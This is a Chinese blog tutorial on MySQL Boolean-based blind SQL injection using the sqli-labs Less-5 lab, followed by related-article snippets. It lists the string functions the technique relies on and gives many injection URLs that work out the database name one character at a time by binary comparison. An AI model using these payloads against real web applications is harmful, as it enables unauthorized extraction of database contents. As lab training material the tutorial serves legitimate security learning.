mysql数据库的布尔盲注_mysql注入-布尔盲注总结

最新推荐文章于 2023-08-12 14:45:26 发布
最新推荐文章于 2023-08-12 14:45:26 发布
阅读量542 收藏
点赞数
文章标签: mysql数据库的布尔盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28956075/article/details/113713790
版权

mysql中布尔盲注总结

布尔盲注常用函数:

length()字符串长度判断

left(a,b)从左侧截取a的前b位

substr(a,b,c)从b位置开始,截取字符串a的c长度。

ascii()将某个字符转换成相应的ascii码值。

mid(a,b,c)从位置b开始,截取a字符串的c位

ord函数与ascii()函数类似,将某个字符转换成相应的ascii码值。

regrexp正则注入

limit使用方法:limit的使用格式为limit m,n,其中m是指记录开始的位置,从0开始表示第一条记录;n是指取n条记录。例如:limit 0,1表示从第一题记录开始,取一条记录。

布尔盲注实例

靶场为sqlilabs第五关

确定该处为sql盲注后,首先使用length()函数判断当前数据库的长度:

当猜解数据库database()长度错误时,页面没有返回you are in......如图:

20190505222722175226.png

当猜解数据库database()长度正确时,页面返回you are in......如图:

20190505222722408625.png

在判断database()的长度时,可以使用大于号和小于号>,

20190505222722624445.png

下面采用上述函数依次猜解数据库名:

left(a,b)从左侧截取a的前b位

1,left(database(),1)>‘a‘截取database()的第一个字符,与我们给出的字符进行比较,若页面返回you are in.......则说明我们判断正确,database()的第一个字符的ascii码大于我们给出的字符a的ascii码。

20190505222722809015.png

2,继续二分法判断

//判断database()的第一个字符的ascii码是否大于我们给出的字符n的ascii码。

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and left(database(),1)>'n'--+

//判断database()的第一个字符的ascii码是否大于我们给出的字符t的ascii码

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and left(database(),1)>'t'--+

//判断database()的第一个字符的ascii码是否大于我们给出的字符q的ascii码

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and left(database(),1)>'q'--+

//判断database()的第一个字符的ascii码是否大于我们给出的字符r的ascii码

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and left(database(),1)>'r'--+

//ascii码大于r小于t的只有s,即猜解成功。

3,依次进行如上判断,可以猜解出database()的第一个字符为s,接着继续猜解第二个字符:

//判断database()的第二个字符的ascii码是否大于我们给出的字符a的ascii码。

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and left(database(),2)>'sa'--+

//判断database()的第二个字符的ascii码是否大于我们给出的字符n的ascii码。

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and left(database(),2)>'sn'--+

//判断database()的第二个字符的ascii码是否大于我们给出的字符g的ascii码。

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and left(database(),2)>'sg'--+

//判断database()的第二个字符的ascii码是否大于我们给出的字符d的ascii码。

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and left(database(),2)>'sd'--+

//判断database()的第二个字符的ascii码是否大于我们给出的字符e的ascii码。

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and left(database(),2)>'se'--+

依次进行如上判断,可以猜解出database()的第二个字符为e,接着继续猜解剩下的字符即可;

在实际渗透中可以借助python脚本进行盲注,或者使用sqlmap等sql注入工具进行注入。

ascii()将某个字符转换成相应的ascii码值。

//判断database()的第一个字符的ascii码值是否大于我们给出的ascii码值

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and ascii(left(database(),1))>114--+

ord函数与ascii()函数类似,将某个字符转换成相应的ascii码值。

//判断database()的第一个字符的ascii码值是否大于我们给出的ascii码值

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and ord(left(database(),1))>114--+

substr(a,b,c)从b位置开始,截取字符串a的c长度。

//substr(a,b,c)函数表示从a字符串的第b个字符开始,截取c个字符。b的最小值为1。

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and substr(database(),1,1)>'r'--+

//依次采用二分法查找即可

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and substr(database(),1,2)>'sd'--+

mid(a,b,c)从位置b开始,截取a字符串的c位

//mid(a,b,c)函数表示从a字符串的第b个字符开始,截取c个字符。b的最小值为1。

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and mid(database(),1,1)>'a'--+

//依次采用二分法查找即可

http://192.168.174.132/sqlilabs/Less-5/index.php?id=1' and mid(database(),1,8)>'securita'--+

regrexp正则注入

zetachow晓代~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL布尔盲注
一个普普通通的博客
03-01 1405
Mysql注入布尔盲注
sql注入知识---布尔盲注
尘玥的故事
04-08 480
一般的情况下我们面对这种盲注都是写脚本跑(提前准备然后更具具体的情况再改脚本)表现:会对你的输出进行显示正确错误,但不会报错。通过返回的正确与否来判断数据库的每个字母。
mysql盲注_二十八、MySQL盲注
weixin_39990401的博客
01-18 263
在学习本实验之前,请确保已经学过“SQL注入原理与实践”这个实验。在 SQL注入原理与实践 这个实验,我们已经知道了SQL注入的原理,并且能够完成支持union 且有回显的注入,这种情况是最简单的,最容易注入的,那么,如果注入点发生在update、insert等这些不会有返回内容而仅仅只返回true或者false的 SQL语句,或者仅仅select而没有输出查询的内容时,是不是就不能获取数据了...
渗透测试基础-盲注布尔盲注和时间盲注
weixin_45488495的博客
04-09 3433
渗透测试基础-盲注布尔盲注和时间盲注盲注实现的关键函数布尔盲注靶场演练时间盲注靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 盲注的特点如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔盲注和时间盲注 盲注也分布尔盲注和时间盲注,这里分别来了解一下各自的区别 布尔盲注:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
SQL注入之路之二:布尔型(boolean)盲注
weixin_62715196的博客
08-10 779
简单描述什么是布尔盲注以及对与布尔盲注如何进行注入,通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单注入,并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔注入的合理性
JDBC对MySQL数据库布尔字段的操作方法
09-03
主要介绍了JDBC对MySQL数据库布尔字段的操作方法,实例分析了JDBC操作mysql布尔字段的原理与实现技巧,需要的朋友可以参考下
mysql-blind(高级盲注+基于布尔).docx
01-23
盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,...
aleenzz#MYSQL_SQL_BYPASS_WIKI#2-5-我与云锁有个约会1
07-25
以下内容都是把云锁的增强型防护开启简单的布尔盲注生僻函数绕过 这里比较难的点其实也在from,但是比云盾好点,毕竟可以用到注释看到这两条语句其实我们可以清楚的知
mysql加强 布尔教育 40-46 共46集
05-07
mysql加强 布尔教育 40-46 共46集 mysql加强 布尔教育 40-46 共46集
mysql加强 布尔教育 1-13 共46集
05-07
mysql加强 布尔教育 1-13 共46集 mysql加强 布尔教育 1-13 共46集
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注注入的一种,指的是在不知道数据库返回值的情况下对数据的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
VictorZhang
07-30 5770
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https://github.com/webattacker/sqli-labs 将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp64\www 下 3.在浏览器上访问http://localhost...
MySQL布尔盲注
fdhdgsdfdsa的博客
03-11 239
盲注注入的一种方式,是在页面只返回true和false时使用。 需要准备PHP知识 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句 以上每个函数都可使用,但有可能被禁用,可选其他函数测试 一、判断是否存在盲注 可能需要闭合及注释操作,此处未演示 03.php?id=1 and 1=1
sql布尔盲注
2203_75336412的博客
08-12 212
id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100--+页面返回有数据。id=1' and (ascii(substr(( select id users limit 0,1),1,1)))>30--+页面返回有数据。id=1' and 1=1 --+ 页面有返回?通过这个方法判断出整个数据库名。
mysql盲注总结
z7sz的博客
06-21 1096
本文的内容主要是对mysql盲注总结
SQL注入盲注
胖虎的博客
11-15 1720
sql注入布尔类型盲注,结合burpsuite工具实现半自动化
布尔盲注怎么用,一看你就明白了。布尔盲注原理+步骤+实战教程
热门推荐
wangyuxiang946的博客
03-16 2万+
写给每一个为了让自己变得更好,而坚持努力的你。
SQL盲注篇之布尔盲注
weixin_47785246的博客
07-11 2991
简单介绍SQL注入盲注,通过靶场的练习,演示SQL盲注的一些常用方法与思路。
SQL注入——布尔盲注
heyingcheng的博客
03-07 675
当猜测是第一个字母的ascii码是115,页面显示为真,再查表,得出对应字母。后续的操作是依次猜解,陆续得出数据布尔盲注:Web页面只返回True真,False假两种类型,利用页面的返回不同,逐个猜解数据。页面没有报错回显,不知道数据库具体返回值的情况下,对数据库的内容进行猜解,实行SQL注入。对方既没有回显位又没有报错,如果页面有真假值切换,我们就可以使用布尔盲注。当我们猜解数据库名称的第一个字母的ascii是120,页面显示false。盲注分类:布尔盲注,时间盲注,报错盲注
mysql手工布尔盲注
最新发布
10-13
布尔盲注是一种常见的SQL注入攻击方式,可以通过构造特定的SQL语句来获取数据库的敏感信息。手工布尔盲注是指通过手动构造SQL语句来进行盲注攻击,而非使用自动化工具。 在MySQL,可以使用IF函数来进行布尔盲注...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值